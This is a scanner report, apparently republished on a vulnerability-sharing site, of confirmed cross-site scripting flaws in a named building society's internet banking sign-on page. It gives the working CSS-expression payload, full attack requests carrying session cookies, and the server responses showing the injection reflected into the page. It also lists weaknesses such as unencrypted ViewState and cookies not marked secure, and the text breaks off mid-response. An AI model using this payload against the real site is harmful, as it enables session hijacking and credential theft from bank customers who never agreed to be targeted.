XSS, Cross Site Scripting in olb2.nationet.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

Netsparker - Scan Report Summary
TARGET URL
https://olb2.nationet.com/signon/newfs.asp?li...
SCAN DATE
5/3/2011 1:10:25 AM
REPORT DATE
5/3/2011 1:31:35 AM
SCAN DURATION
00:06:56

Total Requests

Average Speed

req/sec.
10
identified
6
confirmed
0
critical
1
informational

DORK TESTS

DORK TESTS
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
40 %
LOW
50 %
INFORMATION
10 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/AppServices/SignOn/SignOnProcess/Default.aspx ID GET Cross-site Scripting Yes
ID GET Cross-site Scripting Yes
ViewState is not Encrypted No
/Discovery/FullFlex/ Forbidden Resource Yes
/Discovery/FullFlex/ApplicationRemote.aspx ID GET Cross-site Scripting No
ID GET Internal Server Error Yes
ASP.NET Version Disclosure No
ID GET ASP.NET Stack Trace Disclosure No
/MyApplications/ Cookie Not Marked As Secure Yes
Cookie Not Marked As HttpOnly Yes
Cross-site Scripting

Cross-site Scripting

3 TOTAL
IMPORTANT
CONFIRMED
2
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /AppServices/SignOn/SignOnProcess/Default.aspx

/AppServices/SignOn/SignOnProcess/Default.aspx CONFIRMED

https://olb2.nationet.com/AppServices/SignOn/SignOnProcess/Default.aspx?ID=%22%20stYle=x:expre/**/ss..

Parameters

Parameter Type Value
ID GET " stYle=x:expre/**/ssion(alert(9)) ns="

Request

GET /AppServices/SignOn/SignOnProcess/Default.aspx?ID=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22 HTTP/1.1
Referer: https://olb2.nationet.com/default.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: olb2.nationet.com
Cookie: SessionTokenIdentifier=5472170750; CookieValidator=0; ASPSESSIONIDCAARCRRS=MAHEJLADKOMMFCDCDLFIGNKA; ASPSESSIONIDCSCRAQTQ=DNPLCBKDLGAPIIGIGMFOBOCL; ASPSESSIONIDAACRARSS=PDFMKEFDGBENGHBFBJOJKFBA; ASP.NET_SessionId=iarlfy55pfctj4zfqoyfbr45; ASPSESSIONIDAQDTDSQR=APDFCGIDNJBGDGMCIOHNHMNB; ASPSESSIONIDAACQBTSS=FBFJFDIDAOMEFFIJPLDGKCLN; ASPSESSIONIDAACSARST=EOPDDBKDMIPGPPPELLNLHJIF; ASPSESSIONIDCACRARSS=OJKPEEIDEGJCOAFIBLEAIFHN; ASPSESSIONIDCSDRBTRR=DKKJEIJDCDPJKDOLFIKDGEKD; ASPSESSIONIDCAARDSRS=DBIMLLADJCCNHLBCHNNNGCOI; ASPSESSIONIDCQCQDSRQ=FIKGNOADGNFBDEFBPBBFEIBN; ASPSESSIONIDAQATDTRQ=HCLINOADFMCFBJFFICAKOAOK; ASPSESSIONIDAADSCSQT=HCNNPDEDKJEALNAFMMLPEKFC; ASPSESSIONIDAQDTCTQR=OKCIBGDDMOEBOENOAGADLGEP; ASPSESSIONIDACBRDSQT=OFLDBLJDGHDLMBDAEADNMLCE; ASPSESSIONIDCSCTBTRQ=ONJIMOADDGGJADLICJFEDKLG; ASPSESSIONIDAQATDSRQ=GKMLBLKDBLMKFBDJDOELFMPK; ASPSESSIONIDCACQBQST=DFODGLKDGMALCMNKCMKBFNOP
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Length: 12957
Content-Type: text/html; charset=utf-8
p3p: CP=ALL DSP COR CURa TAIi PSAa OUR BUS PHY ONL UNI FIN COM NAV DEM HEA PRE OTC
Set-Cookie: SessionTokenIdentifier=0235682886; path=/
Date: Tue, 03 May 2011 01:16:50 GMT



<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>
Nationwide Building Society - Internet Banking
</title>

<script type="text/javascript" src="/CommonFiles/javascript/commonScripts.js"></script>

<script language="javascript" type="text/javascript">
function ShowHelp()
{
// will always open in centre of screen, regardless of screen resolution
var popUpWidth = 640;
var popUpHeight = 480;
var x = ((screen.width - popUpWidth)/2);
var y = ((screen.height - popUpHeight)/2);
window.status='Sign On';

window.open('http://www.nationwide.co.uk/internetbanking/help/help_frameset.asp?helpPageID=help_signon_WP1.htm', 'helpWindow', 'status,HEIGHT='+popUpHeight+',WIDTH='+popUpWidth+',top='+y+',left='+x+',screenX='+x+',screenY='+y+', scrollbars=yes, resizable=yes');
}

function ShowDemo()
{
parent.location.href=('http://www.nationwide.co.uk/internet_banking/demo/default.htm');
}
</script>
<style type="text/css">
body { overflow: auto; }
</style>
<meta name="ngm_IPAddress" content="173.193.214.243">
<meta name="ngm_ProdType" content="InitiateSignOn">
<meta name="ngm_CID" content="">
<meta name="ngm_PgDesc" content="InitiateSignOn">
<script language="javascript" src="/CommonFiles/javascript/NBS_script.js"></script>
<link href="/styleSheets/tableless/header.css" type="text/css" rel="Stylesheet" media="all" /><link href="/styleSheets/tableless/header_Style1.css" type="text/css" rel="Stylesheet" media="all" /><link href="/styleSheets/Style1.css" type="text/css" rel="Stylesheet" media="all" /><link href="/styleSheets/sign-on.css" type="text/css" rel="Stylesheet" media="all" /></head>

<body id="ctl00_SignOnBody" class="framelessPage" Onload="PageLoadEvents();">
<form name="aspnetForm" method="post" action="InitiateSignOn.aspx?ID=%22+style%3dx%3aexpre%2f**%2fssion(netsparker(9))+ns%3d%22" id="aspnetForm" autocomplete="off">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTgyODI5MzU4OQ9kFgJmD2QWAgIDDxYCHgZPbmxvYWQFEVBhZ2VMb2FkRXZlbnRzKCk7FgICAQ9kFgICAQ9kFgZmDw8WAh4EVGV4dAXnBTx1bCBpZD0nbWVudWl0ZW1zJz48bGkgY2xhc3M9J2FjdGl2ZUl0ZW0nPlNpZ24gT248L2xpPjxsaT48YSBocmVmPScvc2lnbm9uL1JlZ2lzdHJhdGlvbjIuYXNwJz5SZWdpc3RlciBGb3IgU2VydmljZTwvYT48L2xpPjxsaT48YSBocmVmPSMgb25jbGljaz0iU09XUDFfb3BlbldpbmRvdygwKTsiPkZvcmdvdHRlbiBZb3VyIERldGFpbHM8L2E+PC9saT48bGk+PGEgaHJlZj0jIG9uY2xpY2s9IlNPV1AxX29wZW5XaW5kb3coMyk7Ij5Ucm91Ymxlc2hvb3Rpbmc8L2E+PC9saT48bGk+PGEgaHJlZj0jIG9uY2xpY2s9IlNPV1AxX29wZW5XaW5kb3coMSk7Ij5TZXJ2aWNlIEF2YWlsYWJpbGl0eTwvYT48L2xpPjxsaT48YSBocmVmPSMgb25jbGljaz0iU09XUDFfb3BlbldpbmRvdygyKTsiPlNlY3VyaXR5PC9hPjwvbGk+PGxpPjxhIGhyZWY9IyBvbmNsaWNrPSJTT1dQMV9vcGVuV2luZG93KDcpOyI+VGVybXMgJmFtcDsgQ29uZGl0aW9uczwvYT48L2xpPjxsaT48YSBocmVmPSMgb25jbGljaz0id2luZG93Lm9wZW4oJ1xvcmRlcmNhcmRyZWFkZXIuYXNweD9JRD0iIHN0eWxlPXg6ZXhwcmUvKiovc3Npb24obmV0c3Bhcmtlcig5KSkgbnM9IicsJ1BvcFVwJywnd2lkdGg9Nzg1LGhlaWdodD01NTAsc2NyZWVuWD0wLHNjcmVlblk9MCx0b3A9MjAsbGVmdD0yMCx0b29sYmFyPXllcyxtZW51YmFyPXllcyxzY3JvbGxiYXJzLHJlc2l6YWJsZT15ZXMsc3RhdHVzJyk7Ij5PcmRlciBDYXJkIFJlYWRlcjwvYT48L2xpPjwvdWw+ZGQCBA8PZBYCHgdvbmNsaWNrBUVfX2RvUG9zdEJhY2soJ2N0bDAwJGNwaE1haW5Db250ZW50JGJ0blN1Ym1pdCcsJycpO3RoaXMuZGlzYWJsZWQ9dHJ1ZTtkAgYPDxYEHgZUYXJnZXQFBl9ibGFuax4LTmF2aWdhdGVVcmwFM2h0dHA6Ly93d3cubmF0aW9ud2lkZS5jby51ay9zYXZpbmdzL2Fib3V0bXlzYXZlLmh0bWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBSZjdGwwMCRjcGhNYWluQ29udGVudCRjaGtib3hSZW1lbWJlck51bbxIEOpAUhFzXjUXuXvipFzNuIFu" />
</div>

<script type="text/javascript">
<!--
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
// -->
</script>


<div id="headerframe">
<div id="header-info">
<div id="nbslogo">
<a href="http://www.nationwide.co.uk" target="_top" onmouseover="window.status='Nationwide home page';return true;" onmouseout="window.status='';return true;" ><img src="/Images/nbslogo_dec08.gif" alt="Nationwide home page" /></a>
</div>
<h1>Internet Banking</h1>
</div>

<div id="header-nav">
<p id="header-blurb">Welcome to Nationwide's Internet Banking</p>
<ul id="header-nav-secondary">
<li><a href="javascript:ShowDemo();" onmouseover="window.status='Demonstration of this site';return true;" onmouseout="window.status='';return true;" title="Demonstration of this site"><b>Demo</b></a></li>
<li><a href="javascript:ShowHelp();" onmouseover="window.status='View help topics for this page';return true;" onmouseout="window.status='';return true;" title="View help topics for this page"><b>Help</b></a></li>
</ul>
</div>
</div>
<div id="main-content" style="position:absolute; top:115px;" >

<script type="text/javascript">
function msg1() {window.status="Please enter your 10-digit Customer Number"}

function PageLoadEvents()
{
document.aspnetForm.ctl00_cphMainContent_txtScreenResolution.value = screen.width + " x " + screen.height;
document.aspnetForm.ctl00_cphMainContent_txtPersistentCookies.value = persistentCookiesEnabled();
var visitortime = new Date();
var timeZone = ""
if (visitortime)
{
document.aspnetForm.ctl00_cphMainContent_txtTimeZone.value = (-(visitortime.getTimezoneOffset()/60));
}
document.aspnetForm.ctl00_cphMainContent_txtReferringUri.value = document.referrer;
document.aspnetForm.txt0235682886.focus();


checkforcookie();


}

function persistentCookiesEnabled()
{
var cookieName = "OlbTempTestCookie";
var expireDate = new Date();
expireDate.setDate(expireDate.getDate() + 2);
document.cookie = cookieName + "=" + cookieName +"; path=/; expires=" + expireDate.toGMTString();
var start = document.cookie.indexOf(cookieName + "=" + cookieName);
if (document.cookie.indexOf(cookieName + "=" + cookieName) > -1)
{
document.cookie = cookieName + "=; path=/; expires=Thu, 01-Jan-1970 00:00:01 GMT";
return true;
}
return false;
}

function getCookie(sCookieName)
{
var aCookie = document.cookie.split("; ");

for (var i=0; i < aCookie.length; i++)
{
var thisCookie = aCookie[i].split("=");

if (sCookieName == thisCookie[0])
return unescape(thisCookie[1]);
}

return '';
}

function checkforcookie ()
{
var strCustomerNum = '';
strCustomerNum = getCookie("CIS");
if(strCustomerNum.length == 10)
{
document.aspnetForm.txt0235682886.value = strCustomerNum;
document.getElementById("ctl00_cphMainContent_chkboxRememberNum").checked = true;
}
}
</script>
<script type="text/javascript" src="/SignOn/javascript/add-event.js"></script>

<table width="100%" border="0" cellspacing="0" cellpadding="0" id="table1">
<tr>
<td width="5"><img src="/Images/pixel.gif" width="5" height="1" alt="" /></td>
<td valign="top">
<!-- Start of Navigation links -->
<span class='doNotPrint'>
<div id='menu'>
<div id='menuHdr'>INTERNET BANKING</div>
<span id="ctl00_cphMainContent_lblMenu"><ul id='menuitems'><li class='activeItem'>Sign On</li><li><a href='/signon/Registration2.asp'>Register For Service</a></li><li><a href=# onclick="SOWP1_openWindow(0);">Forgotten Your Details</a></li><li><a href=# onclick="SOWP1_openWindow(3);">Troubleshooting</a></li><li><a href=# onclick="SOWP1_openWindow(1);">Service Availability</a></li><li><a href=# onclick="SOWP1_openWindow(2);">Security</a></li><li><a href=# onclick="SOWP1_openWindow(7);">Terms &amp; Conditions</a></li><li><a href=# onclick="window.open('\ordercardreader.aspx?ID=" style=x:expre/**/ssion(netsparker(9)) ns="','PopUp','width=785,height=550,screenX=0,screenY=0,top=20,left=20,toolbar=yes,menubar=yes,scrollbars,resizable=yes,status');">Order Card Reader</a></li></ul></span>
</div>
</span>
<!-- End of Navigation links -->

<!--Add new security link -->
<br />
<a href="#" onclick="SOWP1_openWindow(4);"><img alt="*" src="/Images/ad3.gif" border="0" /></a>
<!-- End of new security promise code -->
</td>
<td width="5">
<img src="/Images/pixel.gif" width="5" height="1" alt="" />
</td>
<td width="100%" valign="top">

<!--TITLE> box-->
<div id="sign-on-options">
<div id="sign-on-cn">
<h2>Sign on to my Internet Banking</h2>

<span id="ctl00_cphMainContent_lblRcaErrorText"></span>

<div id="sign-on-cn-main" class="">
<span id="ctl00_cphMainContent_lblRcaErrorField"></span>
<div class="content">
<label for="txt0235682886">Enter your customer number</label>
<div class="question-set">
<input name="txt0235682886" type="text" maxlength="10" id="txt0235682886" tabindex="1" class="input" size="14" width="100" OnFocus="msg1()" />
<input style="display: none" />
<input type="submit" name="ctl00$cphMainContent$btnSubmit" value="Continue >>" onclick="__doPostBack('ctl00$cphMainContent$btnSubmit','');this.disabled=true;" id="ctl00_cphMainContent_btnSubmit" tabindex="2" />
</div>

<div class="question-set">
<label for="chkboxRememberName" class="checkbox"><input id="ctl00_cphMainContent_chkboxRememberNum" type="checkbox" name="ctl00$cphMainContent$chkboxRememberNum" onclick="javascript:setTimeout('__doPostBack(\'ctl00$cphMainContent$chkboxRememberNum\',\'\')', 0)" tabindex="3" /> Remember my customer number*</label>
<p>*Only select this if this is your computer and it is not used by anyone else</p>

</div>

</div>
</div>
<p class="warning">For security reasons, when you have finished using Internet Banking always select SIGN OFF.</p>
</div>
<div id="sign-on-my-save">
<h2>Sign on to MySave</h2>
<div id="my-save-info">
<img src="/images/my-save.gif" alt="MySave Online Savings - Manage your MySave account online" />
<a id="ctl00_cphMainContent_linkWhatsThis" href="http://www.nationwide.co.uk/savings/aboutmysave.htm" target="_blank">What is MySave?</a>
</div>
<div id="my-save-sign-on">
<p>Sign on to your MySave account</p>
<input type="submit" name="ctl00$cphMainContent$btnMySave" value="Go to MySave >>" id="ctl00_cphMainContent_btnMySave" tabindex="3" class="button" />
</div>
</div>
</div>

</td>
<!--Final White Spacing column gap-->
<td width="5"><img src="/Images/pixel.gif" width="5" height="1" alt="" /></td>
</tr>
</table>

<input type="hidden" name="ctl00$cphMainContent$txtScreenResolution" id="ctl00_cphMainContent_txtScreenResolution" />
<input type="hidden" name="ctl00$cphMainContent$txtPersistentCookies" id="ctl00_cphMainContent_txtPersistentCookies" />
<input type="hidden" name="ctl00$cphMainContent$txtTimeZone" id="ctl00_cphMainContent_txtTimeZone" />
<input type="hidden" name="ctl00$cphMainContent$txtReferringUri" id="ctl00_cphMainContent_txtReferringUri" />


</div>

<div>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWCQK/odzJBQKl+qyOCQKequbgAgKFg47fDgKozL+oDAKh8OOtAQLs68+tCgLC6q+pCgL0ieNkp7EGia92nqnP9lCSky/TfuLkRpo=" />
</div></form>
</body>
</html>
- /AppServices/SignOn/SignOnProcess/Default.aspx

/AppServices/SignOn/SignOnProcess/Default.aspx CONFIRMED

https://olb2.nationet.com/AppServices/SignOn/SignOnProcess/Default.aspx?ID=%22%20stYle=x:expre/**/ss..

Parameters

Parameter Type Value
ID GET " stYle=x:expre/**/ssion(alert(9)) ns="
empty POST 3

Request

POST /AppServices/SignOn/SignOnProcess/Default.aspx?ID=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22 HTTP/1.1
Referer: https://olb2.nationet.com/default.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olb2.nationet.com
Cookie: SessionTokenIdentifier=6327776126; CookieValidator=0; ASPSESSIONIDCAARCRRS=MAHEJLADKOMMFCDCDLFIGNKA; ASPSESSIONIDCSCRAQTQ=DNPLCBKDLGAPIIGIGMFOBOCL; ASPSESSIONIDAACRARSS=PDFMKEFDGBENGHBFBJOJKFBA; ASP.NET_SessionId=iarlfy55pfctj4zfqoyfbr45; ASPSESSIONIDAQDTDSQR=APDFCGIDNJBGDGMCIOHNHMNB; ASPSESSIONIDAACQBTSS=FBFJFDIDAOMEFFIJPLDGKCLN; ASPSESSIONIDAACSARST=EOPDDBKDMIPGPPPELLNLHJIF; ASPSESSIONIDCACRARSS=OJKPEEIDEGJCOAFIBLEAIFHN; ASPSESSIONIDCSDRBTRR=DKKJEIJDCDPJKDOLFIKDGEKD; ASPSESSIONIDCAARDSRS=DBIMLLADJCCNHLBCHNNNGCOI; ASPSESSIONIDCQCQDSRQ=FIKGNOADGNFBDEFBPBBFEIBN; ASPSESSIONIDAQATDTRQ=HCLINOADFMCFBJFFICAKOAOK; ASPSESSIONIDAADSCSQT=HCNNPDEDKJEALNAFMMLPEKFC; ASPSESSIONIDAQDTCTQR=OKCIBGDDMOEBOENOAGADLGEP; ASPSESSIONIDACBRDSQT=OFLDBLJDGHDLMBDAEADNMLCE; ASPSESSIONIDCSCTBTRQ=ONJIMOADDGGJADLICJFEDKLG; ASPSESSIONIDAQATDSRQ=GKMLBLKDBLMKFBDJDOELFMPK; ASPSESSIONIDCACQBQST=DFODGLKDGMALCMNKCMKBFNOP
Content-Length: 7
Accept-Encoding: gzip, deflate

empty=3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Length: 12957
Content-Type: text/html; charset=utf-8
p3p: CP=ALL DSP COR CURa TAIi PSAa OUR BUS PHY ONL UNI FIN COM NAV DEM HEA PRE OTC
Set-Cookie: SessionTokenIdentifier=7863457345; path=/
Date: Tue, 03 May 2011 01:16:56 GMT



<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>
Nationwide Building Society - Internet Banking
</title>

<script type="text/javascript" src="/CommonFiles/javascript/commonScripts.js"></script>

<script language="javascript" type="text/javascript">
function ShowHelp()
{
// will always open in centre of screen, regardless of screen resolution
var popUpWidth = 640;
var popUpHeight = 480;
var x = ((screen.width - popUpWidth)/2);
var y = ((screen.height - popUpHeight)/2);
window.status='Sign On';

window.open('http://www.nationwide.co.uk/internetbanking/help/help_frameset.asp?helpPageID=help_signon_WP1.htm', 'helpWindow', 'status,HEIGHT='+popUpHeight+',WIDTH='+popUpWidth+',top='+y+',left='+x+',screenX='+x+',screenY='+y+', scrollbars=yes, resizable=yes');
}

function ShowDemo()
{
parent.location.href=('http://www.nationwide.co.uk/internet_banking/demo/default.htm');
}
</script>
<style type="text/css">
body { overflow: auto; }
</style>
<meta name="ngm_IPAddress" content="173.193.214.243">
<meta name="ngm_ProdType" content="InitiateSignOn">
<meta name="ngm_CID" content="">
<meta name="ngm_PgDesc" content="InitiateSignOn">
<script language="javascript" src="/CommonFiles/javascript/NBS_script.js"></script>
<link href="/styleSheets/tableless/header.css" type="text/css" rel="Stylesheet" media="all" /><link href="/styleSheets/tableless/header_Style1.css" type="text/css" rel="Stylesheet" media="all" /><link href="/styleSheets/Style1.css" type="text/css" rel="Stylesheet" media="all" /><link href="/styleSheets/sign-on.css" type="text/css" rel="Stylesheet" media="all" /></head>

<body id="ctl00_SignOnBody" class="framelessPage" Onload="PageLoadEvents();">
<form name="aspnetForm" method="post" action="InitiateSignOn.aspx?ID=%22+style%3dx%3aexpre%2f**%2fssion(netsparker(9))+ns%3d%22" id="aspnetForm" autocomplete="off">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTgyODI5MzU4OQ9kFgJmD2QWAgIDDxYCHgZPbmxvYWQFEVBhZ2VMb2FkRXZlbnRzKCk7FgICAQ9kFgICAQ9kFgZmDw8WAh4EVGV4dAXnBTx1bCBpZD0nbWVudWl0ZW1zJz48bGkgY2xhc3M9J2FjdGl2ZUl0ZW0nPlNpZ24gT248L2xpPjxsaT48YSBocmVmPScvc2lnbm9uL1JlZ2lzdHJhdGlvbjIuYXNwJz5SZWdpc3RlciBGb3IgU2VydmljZTwvYT48L2xpPjxsaT48YSBocmVmPSMgb25jbGljaz0iU09XUDFfb3BlbldpbmRvdygwKTsiPkZvcmdvdHRlbiBZb3VyIERldGFpbHM8L2E+PC9saT48bGk+PGEgaHJlZj0jIG9uY2xpY2s9IlNPV1AxX29wZW5XaW5kb3coMyk7Ij5Ucm91Ymxlc2hvb3Rpbmc8L2E+PC9saT48bGk+PGEgaHJlZj0jIG9uY2xpY2s9IlNPV1AxX29wZW5XaW5kb3coMSk7Ij5TZXJ2aWNlIEF2YWlsYWJpbGl0eTwvYT48L2xpPjxsaT48YSBocmVmPSMgb25jbGljaz0iU09XUDFfb3BlbldpbmRvdygyKTsiPlNlY3VyaXR5PC9hPjwvbGk+PGxpPjxhIGhyZWY9IyBvbmNsaWNrPSJTT1dQMV9vcGVuV2luZG93KDcpOyI+VGVybXMgJmFtcDsgQ29uZGl0aW9uczwvYT48L2xpPjxsaT48YSBocmVmPSMgb25jbGljaz0id2luZG93Lm9wZW4oJ1xvcmRlcmNhcmRyZWFkZXIuYXNweD9JRD0iIHN0eWxlPXg6ZXhwcmUvKiovc3Npb24obmV0c3Bhcmtlcig5KSkgbnM9IicsJ1BvcFVwJywnd2lkdGg9Nzg1LGhlaWdodD01NTAsc2NyZWVuWD0wLHNjcmVlblk9MCx0b3A9MjAsbGVmdD0yMCx0b29sYmFyPXllcyxtZW51YmFyPXllcyxzY3JvbGxiYXJzLHJlc2l6YWJsZT15ZXMsc3RhdHVzJyk7Ij5PcmRlciBDYXJkIFJlYWRlcjwvYT48L2xpPjwvdWw+ZGQCBA8PZBYCHgdvbmNsaWNrBUVfX2RvUG9zdEJhY2soJ2N0bDAwJGNwaE1haW5Db250ZW50JGJ0blN1Ym1pdCcsJycpO3RoaXMuZGlzYWJsZWQ9dHJ1ZTtkAgYPDxYEHgZUYXJnZXQFBl9ibGFuax4LTmF2aWdhdGVVcmwFM2h0dHA6Ly93d3cubmF0aW9ud2lkZS5jby51ay9zYXZpbmdzL2Fib3V0bXlzYXZlLmh0bWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBSZjdGwwMCRjcGhNYWluQ29udGVudCRjaGtib3hSZW1lbWJlck51bbxIEOpAUhFzXjUXuXvipFzNuIFu" />
</div>

<script type="text/javascript">
<!--
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
// -->
</script>


<div id="headerframe">
<div id="header-info">
<div id="nbslogo">
<a href="http://www.nationwide.co.uk" target="_top" onmouseover="window.status='Nationwide home page';return true;" onmouseout="window.status='';return true;" ><img src="/Images/nbslogo_dec08.gif" alt="Nationwide home page" /></a>
</div>
<h1>Internet Banking</h1>
</div>

<div id="header-nav">
<p id="header-blurb">Welcome to Nationwide's Internet Banking</p>
<ul id="header-nav-secondary">
<li><a href="javascript:ShowDemo();" onmouseover="window.status='Demonstration of this site';return true;" onmouseout="window.status='';return true;" title="Demonstration of this site"><b>Demo</b></a></li>
<li><a href="javascript:ShowHelp();" onmouseover="window.status='View help topics for this page';return true;" onmouseout="window.status='';return true;" title="View help topics for this page"><b>Help</b></a></li>
</ul>
</div>
</div>
<div id="main-content" style="position:absolute; top:115px;" >

<script type="text/javascript">
function msg1() {window.status="Please enter your 10-digit Customer Number"}

function PageLoadEvents()
{
document.aspnetForm.ctl00_cphMainContent_txtScreenResolution.value = screen.width + " x " + screen.height;
document.aspnetForm.ctl00_cphMainContent_txtPersistentCookies.value = persistentCookiesEnabled();
var visitortime = new Date();
var timeZone = ""
if (visitortime)
{
document.aspnetForm.ctl00_cphMainContent_txtTimeZone.value = (-(visitortime.getTimezoneOffset()/60));
}
document.aspnetForm.ctl00_cphMainContent_txtReferringUri.value = document.referrer;
document.aspnetForm.txt7863457345.focus();


checkforcookie();


}

function persistentCookiesEnabled()
{
var cookieName = "OlbTempTestCookie";
var expireDate = new Date();
expireDate.setDate(expireDate.getDate() + 2);
document.cookie = cookieName + "=" + cookieName +"; path=/; expires=" + expireDate.toGMTString();
var start = document.cookie.indexOf(cookieName + "=" + cookieName);
if (document.cookie.indexOf(cookieName + "=" + cookieName) > -1)
{
document.cookie = cookieName + "=; path=/; expires=Thu, 01-Jan-1970 00:00:01 GMT";
return true;
}
return false;
}

function getCookie(sCookieName)
{
var aCookie = document.cookie.split("; ");

for (var i=0; i < aCookie.length; i++)
{
var thisCookie = aCookie[i].split("=");

if (sCookieName == thisCookie[0])
return unescape(thisCookie[1]);
}

return '';
}

function checkforcookie ()
{
var strCustomerNum = '';
strCustomerNum = getCookie("CIS");
if(strCustomerNum.length == 10)
{
document.aspnetForm.txt7863457345.value = strCustomerNum;
document.getElementById("ctl00_cphMainContent_chkboxRememberNum").checked = true;
}
}
</script>
<script type="text/javascript" src="/SignOn/javascript/add-event.js"></script>

<table width="100%" border="0" cellspacing="0" cellpadding="0" id="table1">
<tr>
<td width="5"><img src="/Images/pixel.gif" width="5" height="1" alt="" /></td>
<td valign="top">
<!-- Start of Navigation links -->
<span class='doNotPrint'>
<div id='menu'>
<div id='menuHdr'>INTERNET BANKING</div>
<span id="ctl00_cphMainContent_lblMenu"><ul id='menuitems'><li class='activeItem'>Sign On</li><li><a href='/signon/Registration2.asp'>Register For Service</a></li><li><a href=# onclick="SOWP1_openWindow(0);">Forgotten Your Details</a></li><li><a href=# onclick="SOWP1_openWindow(3);">Troubleshooting</a></li><li><a href=# onclick="SOWP1_openWindow(1);">Service Availability</a></li><li><a href=# onclick="SOWP1_openWindow(2);">Security</a></li><li><a href=# onclick="SOWP1_openWindow(7);">Terms &amp; Conditions</a></li><li><a href=# onclick="window.open('\ordercardreader.aspx?ID=" style=x:expre/**/ssion(netsparker(9)) ns="','PopUp','width=785,height=550,screenX=0,screenY=0,top=20,left=20,toolbar=yes,menubar=yes,scrollbars,resizable=yes,status');">Order Card Reader</a></li></ul></span>
</div>
</span>
<!-- End of Navigation links -->

<!--Add new security link -->
<br />
<a href="#" onclick="SOWP1_openWindow(4);"><img alt="*" src="/Images/ad3.gif" border="0" /></a>
<!-- End of new security promise code -->
</td>
<td width="5">
<img src="/Images/pixel.gif" width="5" height="1" alt="" />
</td>
<td width="100%" valign="top">

<!--TITLE> box-->
<div id="sign-on-options">
<div id="sign-on-cn">
<h2>Sign on to my Internet Banking</h2>

<span id="ctl00_cphMainContent_lblRcaErrorText"></span>

<div id="sign-on-cn-main" class="">
<span id="ctl00_cphMainContent_lblRcaErrorField"></span>
<div class="content">
<label for="txt7863457345">Enter your customer number</label>
<div class="question-set">
<input name="txt7863457345" type="text" maxlength="10" id="txt7863457345" tabindex="1" class="input" size="14" width="100" OnFocus="msg1()" />
<input style="display: none" />
<input type="submit" name="ctl00$cphMainContent$btnSubmit" value="Continue >>" onclick="__doPostBack('ctl00$cphMainContent$btnSubmit','');this.disabled=true;" id="ctl00_cphMainContent_btnSubmit" tabindex="2" />
</div>

<div class="question-set">
